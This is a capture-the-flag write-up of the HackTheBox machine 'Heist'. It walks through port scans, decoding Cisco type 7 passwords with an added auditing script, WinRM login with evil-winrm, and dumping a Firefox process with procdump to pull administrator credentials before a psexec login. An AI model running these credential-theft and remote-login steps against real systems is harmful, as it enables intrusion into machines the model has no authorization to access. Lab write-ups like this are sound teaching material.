We always start with an Nmap scan.
nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Wed Jul 7 08:15:43 2021 as: nmap -sC -sV -oA nmap 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.51s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3h00m54s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-07T10:17:59
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 7 08:17:41 2021 -- 1 IP address (1 host up) scanned in 118.25 seconds
Another day, another HackTheBox machine. We have our Nmap scan result, but before going deep let's check whether the WinRM port is open.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/retired/10.10.10.149]
└─$ nmap -sV -sC -p 5985 10.10.10.149
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 13:11 WAT
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.56s latency).

PORT     STATE SERVICE VERSION
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.52 seconds
Seems it's open. Now let's start our enumeration, SMB first.
We have no anonymous access to SMB, so let's hit HTTP.
Trying some default credentials I got no luck, and a few SQL injection payloads got nothing either, but we still have "Login as guest", so let's try it.
The issues comment board seems cool; also a user named hazard attached a file, so let's check it out.
We have some password hashes that I think belong to hazard. Now let's try cracking them all.
The website I used to crack them gave:
0242114B0E143F015F5D1E161713 - $uperP@ssword
02375012182C1A1D751618034F36415408 - Q4)sJu\Y8qz*A3?d
One more hash to go; I used John the Ripper to crack that one.
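The two strings the website reversed above are Cisco IOS "type 7" passwords: a fixed-key XOR encoding, not a hash, so anyone holding the config recovers them offline. As an added example (not from the original post or from the box), here is a small auditor that scans a config dump for type 7 lines and reverses each one so an admin can find and replace them with type 8/9 secrets. The sample config is constructed; only the two encoded values come from the post, and the type 9 line is a labelled placeholder.

```python
import re

# Fixed XOR key of the Cisco IOS "type 7" reversible password encoding.
CISCO7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Matches "... password 7 <hex>" or "... secret 7 <hex>" lines of an IOS config.
TYPE7_LINE = re.compile(r"^\s*.*?\b(?:password|secret)\s+7\s+(?P<enc>[0-9A-Fa-f]{4,})\s*$")

# Constructed sample config; the two type 7 values are the ones quoted in the post.
SAMPLE_CONFIG = """\
! constructed sample modelled on the attachment described above
version 12.2
no service password-encryption
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 9 $9$CONSTRUCTED_PLACEHOLDER_NOT_A_REAL_HASH
line vty 0 4
 password 7 0A12
"""


def decode_type7(encoded: str) -> str:
    """Reverse a type 7 string: two decimal digits give the key offset, the rest
    is hex, one byte per character, XORed with the rolling fixed key."""
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError(f"not a type 7 string: {encoded!r}")
    offset = int(encoded[:2])
    if offset > 15:
        raise ValueError(f"type 7 offset out of range: {offset}")
    data = bytes.fromhex(encoded[2:])  # raises ValueError on non-hex input
    return bytes(b ^ CISCO7_KEY[(offset + i) % len(CISCO7_KEY)]
                 for i, b in enumerate(data)).decode("latin-1")


def audit_config(config: str) -> list:
    """Flag every type 7 credential in a config dump; each is recoverable offline,
    so treat it as exposed and migrate to type 8/9 (PBKDF2/scrypt) secrets."""
    findings = []
    for lineno, line in enumerate(config.splitlines(), 1):
        m = TYPE7_LINE.match(line)
        if not m:
            continue
        try:
            findings.append({"line": lineno, "status": "reversible",
                             "plaintext": decode_type7(m["enc"])})
        except ValueError as exc:
            findings.append({"line": lineno, "status": "malformed", "detail": str(exc)})
    return findings
```

Running `audit_config(SAMPLE_CONFIG)` reports lines 4 and 5 as reversible (with the two passwords from the post) and line 8 as malformed, while the type 9 secret is correctly left alone.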
Now I think we have 3 users and 3 passwords.
Users: rout3r, hazard, admin
Passwords: $uperP@ssword, Q4)sJu\Y8qz*A3?d, stealth1agent
I tried these on the login form but got no luck. Time to go back to SMB; maybe we can get access there. Trying different combinations of the credentials, I was able to list some shares with
Now let's use impacket to enumerate more users.
We have more users now, but to cut the story short, I was able to get in with evil-winrm the same way I was able to get
evil-winrm -i heist.htb -u chase -p 'Q4)sJu\Y8qz*A3?d'
Going to the user chase's desktop we have user.txt; now we just need to own the system.
System / Administrator
I spent some time enumerating the box and noticed a firefox process running, which is strange.
So I uploaded procdump.exe and dumped one of these firefox processes.
upload procdump64.exe
./procdump64.exe -accepteula
./procdump64.exe -ma 2528
Then I uploaded strings64.exe and used it to view the firefox dump file.
upload strings64.exe
./strings64.exe -accepteula
Searching for "password", I got the admin credentials: 4dD!5}x/re8]FBuZ. Nice, time to use psexec.py to log in with the admin credentials we found in the firefox dump.
We are in and done; let's get the last flag.
And we are system.
Greetings from Muzec